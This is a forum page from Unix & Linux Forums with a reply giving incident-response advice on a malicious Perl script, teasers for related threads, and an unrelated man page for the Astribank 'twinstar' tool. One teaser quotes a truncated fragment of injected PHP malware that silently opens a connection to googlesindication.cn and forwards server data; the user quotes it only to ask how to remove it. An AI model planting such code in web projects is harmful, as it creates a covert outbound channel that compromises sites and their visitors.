Login or Register to Ask a Question and Join Our Community

Sponsored Content
Full Discussion: Malicious perl script
Operating Systems Linux Debian Malicious perl script Post 302992372 by drysdalk on Friday 24th of February 2017 08:46:56 AM
Old 02-24-2017
Hello,

That's certainly a good idea in general, to run something like 'watchdog' or 'tripwire'. I don't think anything it's found is particularly worrisome, and is all stuff I'd more or less expect to be there, depending on what you have installed.

The main thing I'd definitely do is look at what processes are running at the moment, and investigate the /proc entries for any suspicious ones that are still there. Next, read through your Web logs for anything that looks abnormal around the time that the incident is alleged to have began. With any luck there's a clear trace in the Web logs that will show you where the dodgy scripts were stored, and perhaps even how they came to be uploaded.
 

7 More Discussions You Might Find Interesting

1. Shell Programming and Scripting

remove malicious codes from a file

Hello, Please advise a script/command to remove the following line for a file <?php error_reporting(0); $fn = "googlesindication.cn"; $fp = fsockopen($fn, 80, $errno, $errstr, 15); if (!$fp) { } else { $query='site='.$_SERVER; $out = "GET /links.php?".$query." HTTP/1.1\r\n"; ... (5 Replies)
Discussion started by: fed.linuxgossip
5 Replies

2. Shell Programming and Scripting

Anti-malicious files and viruses

Hello I ask you how to make a Anti-malicious files and viruses Or if one of you a small example of the work on the same place and I hope my request I want a small patch or the process of examination Virus http://www.google.jo/images/cleardot.gif ---------- Post updated... (1 Reply)
Discussion started by: x-zer0
1 Replies

3. Cybersecurity

How to analyze malicious code

A series on The H about analyzing potentially malicious code flying around on the net. Pretty well written, and a nice read for those interested in how exploits work: CSI:Internet - Alarm at the pizza service CSI:Internet - The image of death CSI:Internet - PDF timebomb CSI:Internet -... (0 Replies)
Discussion started by: pludi
0 Replies

4. Shell Programming and Scripting

calling a perl script with arguments from a parent perl script

I am trying to run a perl script which needs input arguments from a parent perl script, but doesn't seem to work. Appreciate your help in this regard. From parent.pl $input1=123; $input2=abc; I tried calling it with system("/usr/bin/perl child.pl $input1 $input2"); and `perl... (1 Reply)
Discussion started by: grajp002
1 Replies

5. Shell Programming and Scripting

Perl : embedding java script with cgi perl script

Hi All, I am aware that html tags can be embedded in cgi script as below.. In the same way is it possible to embed the below javascript in perl cgi script ?? print("<form action="action.htm" method="post" onSubmit="return submitForm(this.Submitbutton)">"); print("<input type = "text"... (1 Reply)
Discussion started by: scriptscript
1 Replies

6. Shell Programming and Scripting

Malicious pl script, what does it do

Hello, i found and malicious looking script on my server, here is its code safelly pasted as a text on pastebin: Posting links to pastebin scripts are forbidden at this site. Please what does this script do? It has .pl extension and is on shared cpanel hosting account (1 Reply)
Discussion started by: postcd
1 Replies

7. Programming

PERL: In a perl-scripttTrying to execute another perl-script that SETS SOME VARIABLES !

I have reviewed many examples on-line about running another process (either PERL or shell command or a program), but do not find any usefull for my needs way. (Reviewed and not useful the system(), 'back ticks', exec() and open()) I would like to run another PERL-script from first one, not... (1 Reply)
Discussion started by: alex_5161
1 Replies

LEARN ABOUT DEBIAN

twinstar

TWINSTAR(8)						User Contributed Perl Documentation					       TWINSTAR(8)

NAME

       twinstar - Control the Twinstar feature of a Xorcom Astribank

SYNOPSIS

       twinstar {status|jump|enable-wd|disable-wd|ports}

DESCRIPTION

       twinstar is a tool to control the Twinstar (dual USB port) of a Xorcom Astribank. There is a single and mandatory argument which is the
       command to run. That command operates on all the Astribanks connected to the system.

       Technically all the commands are implemented using Dahdi::Xpp::Mpp which in turn uses astribank_tool. Thus using thus tool will require
       root permissions or otherwise read/write permissions to the USB device.

       The twinstar may be in watchdog mode, which means that it will jump to the remote host if it loses contact with the local host. This can
       happen if the machine is powered down or hangs or even if the xpp drivers are unloaded. Which is why the standard twinstar scripts put the
       Astribanks in twinstar mode on startup and remove it on normal shutdown.

       An Astribank will only jump to the other host (either if asked explicitly or by the watchdog) only if there is a different Astribank
       connected to the other port and running. Which is why all of this has no effect on systems that don't need this functionality.

       The command are:

   status
       Shows the current status of all Astribanks. Note that it only shows Astribanks whose current active USB port is the one connected to this
       computer.

       Example output:

	DEVICE		PORT	   WATCHDOG	   POWER0     POWER1
	usb:001/010	0	   on		   yes	      yes
	usb:001/011	0	   on		   yes	      yes

       For each Astribank on the system that has Twinstar support we get:

       Device
	   The address of the device. This is the bus address, e.g. the address you see in lsusb / dahdi_hardware.

       Port
	   The active USB port on the Astribank. This should be always '0' on the master and always 1 on the slave.

       Watchdog
	   on if the watchdog is triggered in the Atribank or off otherwise.

       Power0, Power1
	   Shows which ports of this Astribank are connected to a USB port of a running computer. This only shows whether or not the USB host
	   provides power.

   ports
       Shows the same 'Port' column of the status command.

   jump
       Command all the Astribanks to jump to the other port. This works regardless the watchdog mode is enabled or not. But requires that there is
       power on the other port.

   enable-wd
       Enables watchdog mode.

   disable-wd
       Disables watchdog mode.

FILES

       twinstar mostly uses astribank_tool which in turn mostly uses USB files under /dev/bus/usb .

perl v5.14.2							    2010-07-28							       TWINSTAR(8)
All times are GMT -4. The time now is 07:33 AM.
Unix & Linux Forums Content Copyright 1993-2022. All Rights Reserved.
Privacy Policy